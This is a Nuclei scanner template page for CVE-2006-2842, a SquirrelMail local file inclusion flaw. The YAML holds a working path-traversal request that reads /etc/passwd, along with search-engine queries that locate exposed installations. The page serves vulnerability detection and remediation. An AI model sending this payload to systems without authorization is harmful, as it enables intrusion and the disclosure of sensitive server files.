Skip to content
Nuclei Templates

Squirrelmail <=1.4.6 - Local File Inclusion

ID: CVE-2006-2842

Severity: high

Author: dhiyaneshDk

Tags: cve,cve2006,lfi,squirrelmail,edb

Description

Section titled “Description”

SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2006-2842


info:
  name: Squirrelmail <=1.4.6 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/27948
    - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
    - http://www.squirrelmail.org/security/issue/2006-06-01
    - https://nvd.nist.gov/vuln/detail/CVE-2006-2842
    - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2006-2842
    cwe-id: CWE-22
    epss-score: 0.28102
    epss-percentile: 0.96839
    cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: squirrelmail
    product: squirrelmail
    shodan-query:
      - http.title:"squirrelmail"
      - cpe:"cpe:2.3:a:squirrelmail:squirrelmail"
    fofa-query: title="squirrelmail"
    google-query: intitle:"squirrelmail"
  tags: cve,cve2006,lfi,squirrelmail,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ef713ea083410c3bed3a81966b840683baf519ff17340696d94e435b710da61502204281f2d469bae015ff0bdb86d6b36fb02acf1b686281d76efb6c2ac84399a71b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2006/CVE-2006-2842.yaml"

View on Github